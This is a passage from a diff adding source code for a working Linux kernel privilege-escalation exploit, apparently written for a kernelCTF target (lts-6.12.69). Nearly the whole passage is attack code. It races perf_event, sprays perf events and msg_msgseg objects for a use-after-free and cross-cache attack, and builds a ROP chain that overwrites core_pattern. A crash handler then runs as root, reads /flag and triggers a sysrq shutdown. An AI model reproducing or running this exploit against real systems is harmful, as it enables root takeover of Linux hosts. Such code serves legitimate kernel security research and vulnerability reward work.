(before_warn) { + log_warn("tainted WARN bit already set before attempt (cannot attribute)"); + continue; + } + + hit = (!before_warn && after_warn) ? 1 : 0; + if (hit) { + log_info("WARN hit at round=%d profile=%s attempt=%d futex_state=%s warn_seen_stage=%d spray_gate_opened=%d", + round, cfg.profile_name, i, + tp_futex_wait_state_string(futex_ret, futex_errno), + warn_seen_stage, spray_gate_opened); + round_hit = 1; + __atomic_store_n(&tp_warn_hit, 1, __ATOMIC_RELEASE); + break; + } + } + + if (round_hit) { + __atomic_store_n(&tp_race_success, 1, __ATOMIC_RELEASE); + __atomic_store_n(&tp_fail_reason, TP_FAIL_NONE, __ATOMIC_RELEASE); + uint64_t orch_gate_ns = get_time_ns(); + if (tp_try_open_spray_gate(orch_gate_ns)) { + uint64_t orch_wait_start = get_time_ns(); + while ((get_time_ns() - orch_wait_start) < TP_FIXED_WARN_HOLD_MAX_NS) { + uint64_t first_alloc_ns = __atomic_load_n(&tp_first_spray_alloc_ns, __ATOMIC_ACQUIRE); + if (first_alloc_ns > 0 && + (get_time_ns() - orch_wait_start) >= TP_FIXED_WARN_HOLD_AFTER_SPRAY_NS) + break; + tp_cpu_relax_once(); + } + } + free(filter_expr); + return NULL; + } + } + + log_warn("WARN not hit after %d round(s), each %d attempts", TP_MAX_ROUNDS, cfg.tries_per_round); + __atomic_store_n(&tp_race_success, 0, __ATOMIC_RELEASE); + __atomic_store_n(&tp_fail_reason, TP_FAIL_WARN_MISS, __ATOMIC_RELEASE); + __atomic_store_n(&tp_spray_gate, -1, __ATOMIC_RELEASE); + stop_threads = 1; + exit_threads = 1; + free(filter_expr); + return NULL; +} + +void *tp_control_thread(void *arg) +{ + (void)arg; + while (!stop_threads && !exit_threads) + usleep(20000); + return NULL; +} + +void *tp_closer_thread(void *arg) +{ + (void)arg; + while (!stop_threads && !exit_threads) + usleep(20000); + return NULL; +} + +/* ================================================================ + * New TP Code End + * ================================================================ + */ + +void cleanup_resources() { + tp_log_stage_summary(); + + if (crash_child_pid > 0) { + kill(crash_child_pid, SIGKILL); + waitpid(crash_child_pid, NULL, 0); + crash_child_pid = -1; + } + + for (int i = 0; i < MSG_SPRAY_COUNT; i++) { + if (msg_queue_ids[i] != -1) { + msgctl(msg_queue_ids[i], IPC_RMID, NULL); + msg_queue_ids[i] = -1; + } + } + for (int i = 0; i < MSG_FAKE_A_COUNT + MSG_FAKE_B_COUNT; i++) { + if (msg_fake_ids[i] != -1) { + msgctl(msg_fake_ids[i], IPC_RMID, NULL); + msg_fake_ids[i] = -1; + } + } +} + + + + +size_t ktext; +Target *g_target = nullptr; + +int bind_to_cpu(int cpu_id) { + cpu_set_t mask; + CPU_ZERO(&mask); + CPU_SET(cpu_id, &mask); + if (sched_setaffinity(0, sizeof(mask), &mask) < 0) { + perror("sched_setaffinity"); + return -1; + } + sched_yield(); + return 0; +} + +const char desired_core_pattern[] = "|/proc/%P/fd/666 %P"; + +void core_pattern_handler(char **argv) +{ + int pid = strtoull(argv[1], 0, 10); + int pfd = syscall(SYS_pidfd_open, pid, 0); + int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0); + int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0); + int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0); + dup2(stdinfd, 0); + dup2(stdoutfd, 1); + dup2(stderrfd, 2); + if(system("id")){}; + if(system("cat /flag;sleep 1;echo o>/proc/sysrq-trigger")){}; + exit(0); +} + +int check_core() +{ + char buf[0x100] = {0}; + int core = open("/proc/sys/kernel/core_pattern", O_RDONLY); + if(read(core, buf, sizeof(buf))){}; + close(core); + return strncmp(buf, desired_core_pattern, strlen(desired_core_pattern)) == 0; +} + +void crash() +{ + int memfd = memfd_create("", 0); + sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff); + dup2(memfd, 666); + close(memfd); + + while (check_core() == 0) + sleep(1); + + *(size_t *)0 = 0; +} + +void user_synchronize_rcu(void) +{ + syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0, -1); +} + + +#define FALLOC_LEN 4096 +char *fmap; + +// ----------------------------------------------------------- +// Thread 4: Sprayer (Occupier Event B) - CPU 3 +// ----------------------------------------------------------- + +struct spray_thread_arg { + int index; + pthread_barrier_t *start_barrier; +}; + +static pthread_t spray_threads[SPRAY_B_COUNT]; +static struct spray_thread_arg spray_args[SPRAY_B_COUNT]; +static pthread_barrier_t spray_start_barrier; + +void *single_spray_thread(void *arg) +{ + struct spray_thread_arg *targ = (struct spray_thread_arg *)arg; + int idx = targ->index; + + bind_to_cpu(0); + + struct perf_event_attr spray_attr; + memset(&spray_attr, 0, sizeof(spray_attr)); + spray_attr.type = PERF_TYPE_SOFTWARE; + spray_attr.size = sizeof(struct perf_event_attr); + spray_attr.config = PERF_COUNT_SW_CPU_CLOCK; + spray_attr.disabled = 1; + spray_attr.exclude_kernel = 1; + + pthread_barrier_wait(targ->start_barrier); + if (__atomic_load_n(&tp_spray_gate, __ATOMIC_ACQUIRE) <= 0 || stop_threads || exit_threads) + return NULL; + + if (idx >= TP_SPRAY_PHASEA_COUNT) { + uint64_t delay_ns = (uint64_t)TP_SPRAY_PHASEB_BASE_DELAY_NS; + + if (TP_SPRAY_PHASEB_STEPS > 0 && TP_SPRAY_PHASEB_STEP_NS > 0) { + int lane = (idx - TP_SPRAY_PHASEA_COUNT) % TP_SPRAY_PHASEB_STEPS; + + delay_ns += (uint64_t)lane * (uint64_t)TP_SPRAY_PHASEB_STEP_NS; + } + + tp_spin_delay_ns(delay_ns); + } + + spray_b_fds[idx] = perf_event_open(&spray_attr, 0, -1, -1, 0); + if (spray_b_fds[idx] >= 0) { + uint64_t now_ns = get_time_ns(); + uint64_t expect = 0; + + if (__atomic_compare_exchange_n(&tp_first_spray_alloc_ns, &expect, now_ns, 0, + __ATOMIC_ACQ_REL, __ATOMIC_ACQUIRE)) + __atomic_store_n(&tp_first_spray_alloc_idx, idx, __ATOMIC_RELEASE); + } + __atomic_fetch_add(&tp_spray_open_done, 1, __ATOMIC_ACQ_REL); + + while (!exit_threads) { + sleep(1); + } + + return NULL; +} + +void *sprayer_thread(void *arg) +{ + bind_to_cpu(1); + int gate_opened = 0; + uint64_t wait_start_ns; + uint64_t now_ns; + int open_done; + + for (int i = 0; i < SPRAY_B_COUNT; i++) + spray_b_fds[i] = -1; + + __atomic_store_n(&tp_first_spray_alloc_ns, 0, __ATOMIC_RELEASE); + __atomic_store_n(&tp_first_spray_alloc_idx, -1, __ATOMIC_RELEASE); + __atomic_store_n(&tp_spray_open_done, 0, __ATOMIC_RELEASE); + + pthread_barrier_init(&spray_start_barrier, NULL, SPRAY_B_COUNT + 1); + + for (int i = 0; i < SPRAY_B_COUNT; i++) { + spray_args[i].index = i; + spray_args[i].start_barrier = &spray_start_barrier; + pthread_create(&spray_threads[i], NULL, single_spray_thread, &spray_args[i]); + } + + log_dbg("[Spray Event] precreated %d spray threads, waiting WARN gate...", SPRAY_B_COUNT); + + while (__atomic_load_n(&tp_spray_gate, __ATOMIC_ACQUIRE) == 0 && + !stop_threads && !exit_threads) { + usleep(1000); + } + + if (__atomic_load_n(&tp_spray_gate, __ATOMIC_ACQUIRE) > 0 && + !stop_threads && !exit_threads) + gate_opened = 1; + + log_info("[Spray Event] Release precreated spray threads (gate_opened=%d)...", gate_opened); + if (gate_opened && TP_GATE_RELEASE_DELAY_NS > 0) + tp_spin_delay_ns((uint64_t)TP_GATE_RELEASE_DELAY_NS); + pthread_barrier_wait(&spray_start_barrier); + + if (!gate_opened) { + if (write(sync_pipe[1], "F", 1) != 1) + log_warn("write sync_pipe failed"); + goto out_join; + } + + wait_start_ns = get_time_ns(); + while (__atomic_load_n(&tp_first_spray_alloc_ns, __ATOMIC_ACQUIRE) == 0 && + !stop_threads && !exit_threads) { + now_ns = get_time_ns(); + if (now_ns - wait_start_ns >= TP_SPRAY_FIRST_ALLOC_WAIT_NS) + break; + tp_spin_delay_ns(20000); + } + + if (write(sync_pipe[1], "C", 1) != 1) + log_warn("write sync_pipe failed"); + + wait_start_ns = get_time_ns(); + while (!stop_threads && !exit_threads) { + open_done = __atomic_load_n(&tp_spray_open_done, __ATOMIC_ACQUIRE); + if (open_done >= SPRAY_B_COUNT) + break; + now_ns = get_time_ns(); + if (now_ns - wait_start_ns >= TP_SPRAY_DONE_WAIT_NS) + break; + tp_spin_delay_ns(100000); + } + + open_done = __atomic_load_n(&tp_spray_open_done, __ATOMIC_ACQUIRE); + log_dbg("[Spray Event] spray open progress: %d/%d", open_done, SPRAY_B_COUNT); + + { + uint64_t warn_ns = __atomic_load_n(&tp_warn_gate_open_ns, __ATOMIC_ACQUIRE); + uint64_t first_alloc_ns = __atomic_load_n(&tp_first_spray_alloc_ns, __ATOMIC_ACQUIRE); + uint64_t gate_release_ns = get_time_ns(); + int first_idx = __atomic_load_n(&tp_first_spray_alloc_idx, __ATOMIC_ACQUIRE); + unsigned long long gate_to_release_ns = 0ULL; + + if (warn_ns > 0 && first_alloc_ns >= warn_ns) { + uint64_t delta_ns = first_alloc_ns - warn_ns; + + log_info("WARN->spray_first_alloc delta_ns=%llu (%.3f ms) first_idx=%d", + (unsigned long long)delta_ns, (double)delta_ns / 1000000.0, first_idx); + } else { + log_warn("WARN->spray_first_alloc delta unavailable warn_ns=%llu first_alloc_ns=%llu idx=%d", + (unsigned long long)warn_ns, (unsigned long long)first_alloc_ns, first_idx); + } + if (warn_ns > 0 && gate_release_ns >= warn_ns) + gate_to_release_ns = (unsigned long long)(gate_release_ns - warn_ns); + log_dbg("spray gate release delay configured_ns=%llu observed_ns=%llu", + (unsigned long long)TP_GATE_RELEASE_DELAY_NS, gate_to_release_ns); + } + + user_synchronize_rcu(); + + log_dbg("Clean sprayed perf finished"); + +out_join: + for (int i = 0; i < SPRAY_B_COUNT; i++) { + pthread_join(spray_threads[i], NULL); + } + + stop_threads = 1; + + pthread_barrier_destroy(&spray_start_barrier); + + while (!exit_threads) { + sleep(1); + } + + return NULL; +} + +void setup_msg_queues() { + printf("[*] Setting up %d message queues...\n", MSG_SPRAY_COUNT); + for (int i = 0; i < MSG_SPRAY_COUNT; i++) { + if ((msg_queue_ids[i] = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) { + perror("msgget"); + exit(1); + } + } + for (int i = 0 ; i < MSG_FAKE_A_COUNT + MSG_FAKE_B_COUNT; i++) { + if ((msg_fake_ids[i] = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) { + perror("msgget"); + exit(1); + } + } +} + +int safe_write_field_tagged(char *buffer, char *shadow_map, int evt_idx, const char *field_name, + int field_offset, uint64_t value, int size) +{ + int evt_base = evt_idx * PERF_EVENT_SIZE; + int field_page_offset = evt_base + field_offset; + + int offset_in_msg = field_page_offset % MSG_SEG_SIZE; + + if (offset_in_msg < MSG_SEG_HEADER_SZ) { + return -1; + } + + int write_offset = offset_in_msg - MSG_SEG_HEADER_SZ; + + if (write_offset + size > MSG_SEG_PAYLOAD_SIZE) return -2; + + int is_conflict = 0; + for (int i = 0; i < size; i++) { + if (shadow_map[write_offset + i]) { + is_conflict = 1; + break; + } + } + + if (is_conflict) { + uint64_t current_val = 0; + if (size == 8) current_val = *(uint64_t*)(buffer + write_offset); + else if (size == 4) current_val = *(uint32_t*)(buffer + write_offset); + + if (current_val != value) { + log_warn("CONFLICT: Event[%d].%s wants 0x%lx, found 0x%lx (overlap)", + evt_idx, field_name, value, current_val); + return -3; + } + } + + memcpy(buffer + write_offset, &value, size); + + memset(shadow_map + write_offset, 1, size); + + return 0; +} + + +void prepare_id_probe_payload(char *buffer, int msg_idx) { + char shadow_map[MSG_SEG_PAYLOAD_SIZE]; + memset(shadow_map, 0, MSG_SEG_PAYLOAD_SIZE); + + uint64_t *p64 = (uint64_t *)buffer; + for (int i = 0; i < MSG_SEG_PAYLOAD_SIZE / 8; i++) { + uint64_t offset = i * 8; + p64[i] = ((uint64_t)msg_idx << 32) | offset; + } + + int off_ctx = g_target->GetFieldOffset("perf_event", "ctx"); + int off_parent = g_target->GetFieldOffset("perf_event", "parent"); + uint64_t fake_ctx_addr = ktext + g_target->GetSymbolOffset("core_pattern"); + for (int evt_idx = 0; evt_idx < 12; evt_idx++) { + safe_write_field_tagged(buffer, shadow_map, evt_idx, "ctx", off_ctx, fake_ctx_addr, 8); + + safe_write_field_tagged(buffer, shadow_map, evt_idx, "parent", off_parent, 0, 8); + } +} + +void spray_tagged_payload() { + struct { + long mtype; + char msg_text[MSG_MSG_PAYLOAD_SZ]; + char seg_text[MSG_SEG_PAYLOAD_SIZE]; + } msg; + + log_dbg("Spraying Tagged Payloads (Stage 1)..."); + + log_dbg("Spraying msg_msgseg Payloads (Stage 1)..."); + for (int i = 0; i < MSG_SPRAY_COUNT; i++) { + msg.mtype = i + 1; + + prepare_id_probe_payload(msg.seg_text, i + 1); + + if (msgsnd(msg_queue_ids[i], &msg, MTEXT_SIZE, IPC_NOWAIT) < 0) { + // handle error + } + } +} + +void prepare_final_release_payload_xdk(char *buffer, int seg_start_rel_to_event, + const std::vector &payload_data) { + int seg_payload_start_rel = seg_start_rel_to_event + MSG_SEG_HEADER_SZ; + int seg_payload_end_rel = seg_start_rel_to_event + MSG_SEG_SIZE; + + int start = (0 > seg_payload_start_rel) ? 0 : seg_payload_start_rel; + int end = ((int)payload_data.size() < seg_payload_end_rel) ? (int)payload_data.size() : seg_payload_end_rel; + + if (start < end) { + memcpy(buffer + (start - seg_payload_start_rel), + payload_data.data() + start, end - start); + } +} + +int read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) { + if (msgrcv(msqid, msgp, msgsz - sizeof(long), msgtyp, 0) < 0) { + perror("[-] msgrcv read"); + return -1; + } + return 0; +} + +int locate_and_leak(int victim_perf_fd) { + uint64_t id_val = 0; + + if (ioctl(victim_perf_fd, PERF_EVENT_IOC_ID, &id_val) < 0) { + return -1; + } + + int victim_msg_idx = (int)(id_val >> 32) - 1; + int id_offset_in_msg = (int)(id_val & 0xFFFFFFFF); + + log_info("Oracle Hit! Victim Msg Index: %d, Event ID Offset: 0x%x", + victim_msg_idx, id_offset_in_msg); + __atomic_store_n(&tp_oracle_hit, 1, __ATOMIC_RELEASE); + __atomic_store_n(&tp_victim_msg_idx, victim_msg_idx, __ATOMIC_RELEASE); + + // Only allow final stage when victim_idx > 0. + if (victim_msg_idx <= 0 || victim_msg_idx >= MSG_SPRAY_COUNT) { + log_warn("Leak none poisoned data: 0x%lx", id_val); + __atomic_store_n(&tp_fail_reason, TP_FAIL_ORACLE_BAD_INDEX, __ATOMIC_RELEASE); + return -1; + } + + // 3. [Final Exploit] + log_info("============================================="); + log_info("Starting Final Exploitation Sequence..."); + __atomic_store_n(&tp_final_stage_entered, 1, __ATOMIC_RELEASE); + __atomic_store_n(&tp_final_result, 1, __ATOMIC_RELEASE); + + int off_event_id = g_target->GetFieldOffset("perf_event", "id"); + int real_id_offset_in_seg = id_offset_in_msg + MSG_SEG_HEADER_SZ; + int event_offset_in_victim = real_id_offset_in_seg - off_event_id; + int victim_seg_rel_to_event = -event_offset_in_victim; + + // Build fake event payload using kernelXDK symbols + auto off_ctx = g_target->GetFieldOffset("perf_event", "ctx"); + auto off_rb = g_target->GetFieldOffset("perf_event", "rb"); + auto off_pmu = g_target->GetFieldOffset("perf_event", "pmu"); + auto off_prog = g_target->GetFieldOffset("perf_event", "prog"); + auto off_cgrp = g_target->GetFieldOffset("perf_event", "cgrp"); + auto off_filters = g_target->GetFieldOffset("perf_event", "addr_filters"); + auto off_refcount= g_target->GetFieldOffset("perf_event", "refcount"); + auto off_destroy = g_target->GetFieldOffset("perf_event", "destroy"); + auto off_state = g_target->GetFieldOffset("perf_event", "state"); + auto off_attach_state = g_target->GetFieldOffset("perf_event", "attach_state"); + + const uint64_t core_pattern_addr = ktext + g_target->GetSymbolOffset("core_pattern"); + + // Build event buffer with safety fields + ROP chain + Payload p(PERF_EVENT_SIZE); + + p.SetU64(off_ctx, 0); + p.SetU64(off_rb, 0); + p.SetU64(off_pmu, core_pattern_addr); + p.SetU64(off_prog, 0); + p.SetU64(off_cgrp, 0); + p.SetU64(off_filters, 0); + p.SetU32(off_refcount, 1); + p.SetU32(off_state, 0); + p.SetU32(off_attach_state, 0); + + // ROP body: overwrite kernel core_pattern with desired_core_pattern using + // pre-built WRITE_WHAT_WHERE_64 actions, then msleep. + RopChain rop(*g_target, ktext); + for (size_t i = 0; i < sizeof(desired_core_pattern); i += 8) { + uint64_t v = 0; + size_t n = sizeof(desired_core_pattern) - i; + memcpy(&v, desired_core_pattern + i, n < 8 ? n : 8); + rop.AddRopAction(RopActionId::WRITE_WHAT_WHERE_64, + {core_pattern_addr + i, v}); + } + rop.AddRopAction(RopActionId::MSLEEP, {0x10000}); + + PayloadBuilder builder(g_target->GetPivots(), ktext); + builder.AddPayload(p, Register::RBX, off_destroy); + builder.AddRopChain(rop); + if (!builder.Build()) { + log_warn("PayloadBuilder failed to assemble fake_event ROP"); + exit(1); + } + + auto& payload_data = p.GetData(); + std::vector xdk_payload(payload_data.begin(), payload_data.end()); + log_info("kernelXDK payload built (%zu bytes)", xdk_payload.size()); + + log_info("Event starts at %d bytes relative to Victim Seg", event_offset_in_victim); + + int window = 16; + log_info("Freeing Neighbor Segments..."); + + char msg_buf_temp[0x2000]; + + for (int i = victim_msg_idx - window; i <= victim_msg_idx + window; i++) { + if (i < 0 || i >= MSG_SPRAY_COUNT || i == victim_msg_idx) continue; + if (read_msg(msg_queue_ids[i], &msg_buf_temp, 0x2000, i + 1) < 0) { + log_warn("Free neighbor %d failed", i); + } + } + + log_info("Spraying Stage 2 (Neighbors)..."); + struct { + long mtype; + char msg_text[MSG_MSG_PAYLOAD_SZ]; + char seg_text[MSG_SEG_PAYLOAD_SIZE]; + } spray_msg; + + for (int i = 0; i < MSG_FAKE_A_COUNT; i++) { + memset(spray_msg.seg_text, 0, MSG_SEG_PAYLOAD_SIZE); + + // Prev_Rel = Victim_Rel - MSG_SEG_SIZE + prepare_final_release_payload_xdk(spray_msg.seg_text, victim_seg_rel_to_event - MSG_SEG_SIZE, xdk_payload); + + // Next_Rel = Victim_Rel + MSG_SEG_SIZE + prepare_final_release_payload_xdk(spray_msg.seg_text, victim_seg_rel_to_event + MSG_SEG_SIZE, xdk_payload); + + spray_msg.mtype = i + 1; + if (msgsnd(msg_fake_ids[i], &spray_msg, MTEXT_SIZE, IPC_NOWAIT) < 0) { + } + } + + + log_info("Freeing Victim Segment %d...", victim_msg_idx); + if (read_msg(msg_queue_ids[victim_msg_idx], &msg_buf_temp, 0x2000, victim_msg_idx + 1) < 0) { + log_warn("Failed to free victim!"); + } + + + log_info("Spraying Stage 3 (Victim)..."); + memset(spray_msg.seg_text, 0, MSG_SEG_PAYLOAD_SIZE); + prepare_final_release_payload_xdk(spray_msg.seg_text, victim_seg_rel_to_event, xdk_payload); + for (int i = MSG_FAKE_A_COUNT; i < MSG_FAKE_A_COUNT + MSG_FAKE_B_COUNT; i++) { + spray_msg.mtype = i + 1; + if (msgsnd(msg_fake_ids[i], &spray_msg, MTEXT_SIZE, IPC_NOWAIT) < 0) { + log_warn("Failed to refill victim!"); + } + } + + // Trigger + log_info("[!!!] Triggering perf_release (ROP)..."); + close(victim_perf_fd); + __atomic_store_n(&tp_final_result, 2, __ATOMIC_RELEASE); + __atomic_store_n(&tp_fail_reason, TP_FAIL_NONE, __ATOMIC_RELEASE); + + log_info("Exploit triggered successfully! Master process exiting..."); + exit(0); +} + +void cross_cache_attack() +{ + log_info("Phase 1: Freeing & Draining Slabs..."); + + int empty_boundary = EMPTY_SLABS * OBJS_PER_SLAB; + for (int i = 0; i < empty_boundary; i++) { + if (i == perf_fd_idx) { + log_dbg("Clean overlapped event c, fd: %d", spray_c_fds[spray_c_count]); + close(spray_c_fds[spray_c_count]); + spray_c_fds[spray_c_count] = -1; + + for (int j = 0; j < SPRAY_B_COUNT; j++) { + if (j != victim_perf_idx + && spray_b_ids[j] >= spray_b_ids[victim_perf_idx] - OBJS_PER_SLAB + && spray_b_ids[j] <= spray_b_ids[victim_perf_idx] + 2) { + log_dbg("Close sprayed event b, fd: %d, id: %ld", spray_b_fds[j], spray_b_ids[j]); + close(spray_b_fds[j]); + spray_b_fds[j] = -1; + } + } + + for (int j = TOTAL_OBJS - 1; j >= TOTAL_OBJS - OBJS_PER_SLAB; j--) { + if (total_fds[j] != -1) { + log_dbg("Close total event, fd: %d", total_fds[j]); + close(total_fds[j]); + } + } + + continue; + } + if (total_fds[i] != -1) + close(total_fds[i]); + } + + log_warn("Flushing Active Slab (Force Unfreeze)..."); + + #define FLUSH_COUNT 32 + int flush_fds[FLUSH_COUNT]; + struct perf_event_attr flush_attr; + memset(&flush_attr, 0, sizeof(flush_attr)); + flush_attr.type = PERF_TYPE_SOFTWARE; + flush_attr.size = sizeof(struct perf_event_attr); + flush_attr.config = PERF_COUNT_SW_CPU_CLOCK; + flush_attr.disabled = 1; + flush_attr.exclude_kernel = 1; + for (int i = 0; i < FLUSH_COUNT; i++) { + flush_fds[i] = perf_event_open(&flush_attr, 0, -1, -1, 0); + } + + for (int i = 0; i < FLUSH_COUNT; i++) { + if (flush_fds[i] != -1) close(flush_fds[i]); + } + + log_info("Step 3: Evicting cpu_partial to flush empty slabs..."); + for (int i = 0; i < EVICT_SLABS; i++) { + int idx = empty_boundary + (i * OBJS_PER_SLAB); + if (idx < TOTAL_OBJS && total_fds[idx] != -1) { + close(total_fds[idx]); + total_fds[idx] = -1; + } + } + + // 4. Wait RCU + log_info("Waiting for RCU grace period..."); + user_synchronize_rcu(); + usleep(50000); + + log_info("Step 4: Starting Double UAF Sequence..."); + spray_tagged_payload(); + if (locate_and_leak(victim_perf_fd) < 0) { + log_warn("Exploit failed!"); + if (__atomic_load_n(&tp_fail_reason, __ATOMIC_ACQUIRE) == TP_FAIL_NONE) + __atomic_store_n(&tp_fail_reason, TP_FAIL_FINAL_FAILED, __ATOMIC_RELEASE); + exit(1); + } + + exit(0); +} + +void *locate_victim_event(void *arg) +{ + bind_to_cpu(0); + + struct perf_event_attr spray_attr; + memset(&spray_attr, 0, sizeof(spray_attr)); + spray_attr.type = PERF_TYPE_SOFTWARE; + spray_attr.size = sizeof(struct perf_event_attr); + spray_attr.config = PERF_COUNT_SW_CPU_CLOCK; + spray_attr.disabled = 1; + spray_attr.exclude_kernel = 1; + + for(int i = 0; i < SPRAY_C_COUNT; i++) { + spray_c_fds[i] = -1; + } + + char sync; + if (read(sync_pipe[0], &sync, 1) < 0) { + log_warn("read sync_pipe failed"); + exit_threads = 1; + stop_threads = 1; + __atomic_store_n(&tp_fail_reason, TP_FAIL_WARN_MISS, __ATOMIC_RELEASE); + return NULL; + } + if (sync != 'C') { + log_warn("[Main] WARN not hit, skip spray/locate flow"); + exit_threads = 1; + stop_threads = 1; + __atomic_store_n(&tp_fail_reason, TP_FAIL_WARN_MISS, __ATOMIC_RELEASE); + return NULL; + } + __atomic_store_n(&tp_warn_hit, 1, __ATOMIC_RELEASE); + __atomic_store_n(&tp_race_success, 1, __ATOMIC_RELEASE); + + log_dbg("[Main] Waiting for spray_b completion..."); + { + uint64_t spray_wait_start = get_time_ns(); + while (__atomic_load_n(&tp_spray_open_done, __ATOMIC_ACQUIRE) < SPRAY_B_COUNT && + (get_time_ns() - spray_wait_start) < TP_SPRAY_DONE_WAIT_NS) { + usleep(1000); + } + log_dbg("spray_b done: %d/%d", __atomic_load_n(&tp_spray_open_done, __ATOMIC_ACQUIRE), SPRAY_B_COUNT); + } + + memset(spray_b_id_valid, 0, sizeof(spray_b_id_valid)); + { + int valid_ids = 0; + uint64_t start_ns = get_time_ns(); + + while (valid_ids < TP_BASELINE_MIN_VALID_IDS && + (get_time_ns() - start_ns) < TP_BASELINE_WAIT_NS) { + for (int i = 0; i < SPRAY_B_COUNT; i++) { + uint64_t id_val = 0; + int fd; + + if (spray_b_id_valid[i]) + continue; + + fd = spray_b_fds[i]; + if (fd < 0) + continue; + if (ioctl(fd, PERF_EVENT_IOC_ID, &id_val) != 0) + continue; + if (id_val == 0) + continue; + + spray_b_ids[i] = id_val; + spray_b_id_valid[i] = 1; + valid_ids++; + } + if (valid_ids >= TP_BASELINE_MIN_VALID_IDS) + break; + usleep(TP_BASELINE_POLL_US); + } + log_dbg("spray baseline ready: valid_ids=%d/%d", valid_ids, SPRAY_B_COUNT); + } + + for (int i = DRAIN_COUNT; i < DRAIN_COUNT + 4; i++) { + close(drain_fds[i]); + drain_fds[i] = -1; + } + + user_synchronize_rcu(); + + for (int pass = 0; pass < TP_ORACLE_PASSES && victim_perf_fd == -1; pass++) { + spray_c_count = 0; + log_dbg("oracle pass %d/%d", pass + 1, TP_ORACLE_PASSES); + for (int k = 0; k < SPRAY_C_COUNT; k++) { + int tmp_probe_fd = perf_event_open(&spray_attr, 0, -1, -1, 0); + if (tmp_probe_fd < 0) + break; + spray_c_fds[spray_c_count] = tmp_probe_fd; + + uint64_t tmp_probe_id; + ioctl(tmp_probe_fd, PERF_EVENT_IOC_ID, &tmp_probe_id); + for (int i = 0; i < SPRAY_B_COUNT; i++) { + if (spray_b_fds[i] == -1 || !spray_b_id_valid[i]) + continue; + + uint64_t current_id; + if (ioctl(spray_b_fds[i], PERF_EVENT_IOC_ID, ¤t_id) == 0) { + if (current_id != spray_b_ids[i]) { + victim_perf_fd = spray_b_fds[i]; + victim_perf_idx = i; + victim_perf_id = current_id; + + log_info("FOUND VICTIM! Index: %d, FD: %d, overwrite by FD: %d", victim_perf_idx, victim_perf_fd, tmp_probe_fd); + log_info("Original ID: %lu, Victim Event ID : %lu", spray_b_ids[victim_perf_idx], victim_perf_id); + + break; + } + } + } + + if (victim_perf_fd != -1) + break; + spray_c_count += 1; + } + + if (victim_perf_fd != -1) + break; + + for (int idx = 0; idx <= spray_c_count && idx < SPRAY_C_COUNT; idx++) { + if (spray_c_fds[idx] != -1) { + close(spray_c_fds[idx]); + spray_c_fds[idx] = -1; + } + } + spray_c_count = 0; + user_synchronize_rcu(); + usleep(TP_ORACLE_PASS_GAP_US); + } + + if (victim_perf_fd == -1 || victim_perf_idx == -1) { + log_warn("Failed to locate victim perf event!"); + __atomic_store_n(&tp_fail_reason, TP_FAIL_ORACLE_NO_VICTIM, __ATOMIC_RELEASE); + exit_threads = 1; + stop_threads = 1; + exit(1); + } + cross_cache_attack(); + + sleep(10000); + return NULL; +} + +int main(int argc, char *argv[]) +{ + setbuf(stdout, NULL); + + for (int i = 1; i < argc; i++) { + if (strcmp(argv[i], "--vuln-trigger") == 0) + vuln_trigger_mode = 1; + } + + if (argc > 1 && !vuln_trigger_mode && argv[1][0] >= '0' && argv[1][0] <= '9') { + core_pattern_handler(argv); + } + + struct rlimit rlim = { + .rlim_cur = 0xf000, + .rlim_max = 0xf000 + }; + setrlimit(RLIMIT_NOFILE, &rlim); + + __atomic_store_n(&tp_warn_hit, 0, __ATOMIC_RELEASE); + __atomic_store_n(&tp_race_success, 0, __ATOMIC_RELEASE); + __atomic_store_n(&tp_oracle_hit, 0, __ATOMIC_RELEASE); + __atomic_store_n(&tp_victim_msg_idx, -1, __ATOMIC_RELEASE); + __atomic_store_n(&tp_final_stage_entered, 0, __ATOMIC_RELEASE); + __atomic_store_n(&tp_final_result, 0, __ATOMIC_RELEASE); + __atomic_store_n(&tp_fail_reason, TP_FAIL_NONE, __ATOMIC_RELEASE); + + g_num_cpus = sysconf(_SC_NPROCESSORS_ONLN); + g_event_id = TP_FIXED_EVENT_ID; + + pthread_t t1, t2, t3, t4, t5; + atexit(cleanup_resources); + + if(pipe(sync_pipe)){}; + + if (syscall(__NR_membarrier, MEMBARRIER_CMD_REGISTER_PRIVATE_EXPEDITED, 0, 0) < 0) { + perror("membarrier register failed (kernel might be too old or CONFIG_MEMBARRIER is off)"); + } + + if (!vuln_trigger_mode) { + TargetDb kxdb("target_db.kxdb", target_db); + + Target st("kernelctf", "lts-6.12.69"); + st.AddStruct("perf_event", 0x520, { + {"pmu", 0x098, 8}, + {"state", 0x0a8, 4}, + {"attach_state", 0x0ac, 4}, + {"ctx", 0x228, 8}, + {"refcount", 0x238, 4}, + {"parent", 0x280, 8}, + {"rb", 0x2d0, 8}, + {"addr_filters", 0x3a0, 8}, + {"destroy", 0x3b8, 8}, + {"id", 0x3d8, 8}, + {"clock", 0x3e8, 8}, + {"prog", 0x400, 8}, + {"cgrp", 0x4f8, 8} + }); + st.AddStruct("pmu", 0x90, { + {"nr_addr_filters", 0x6c, 4}, + {"event_mapped", 0x88, 8} + }); + st.AddSymbol("core_pattern", 0x3611300); + kxdb.AddTarget(st); + + static auto detected_target = kxdb.AutoDetectTarget(); + g_target = &detected_target; + printf("[+] Running on target: %s %s\n", + detected_target.GetDistro().c_str(), detected_target.GetReleaseName().c_str()); + } + + if (vuln_trigger_mode) { + ktext = 0xffffffff81000000; + log_dbg("--vuln-trigger: skipping KASLR bypass, using default ktext=0x%lx", (unsigned long)ktext); + } else { + FILE *f_ktext = fopen("/tmp/ktext", "r"); + if (f_ktext) { + if (fscanf(f_ktext, "%lx", &ktext) == 1) { + log_dbg("Loaded ktext from cache: 0x%lx", (unsigned long)ktext); + } + fclose(f_ktext); + } + if (!ktext) { +#ifndef KASLR_FIXED + ktext = leak_kaslr_base_local(/* window_size = */ 11, + /* samples = */ 100, + /* trials = */ 9); + log_dbg("leak_kaslr_base_local returned ktext=0x%lx", + (unsigned long)ktext); +#else + ktext = 0xffffffff81000000; +#endif + } + if (ktext) { + f_ktext = fopen("/tmp/ktext", "w"); + if (f_ktext) { + fprintf(f_ktext, "%lx", (unsigned long)ktext); + fclose(f_ktext); + } + } + } + + 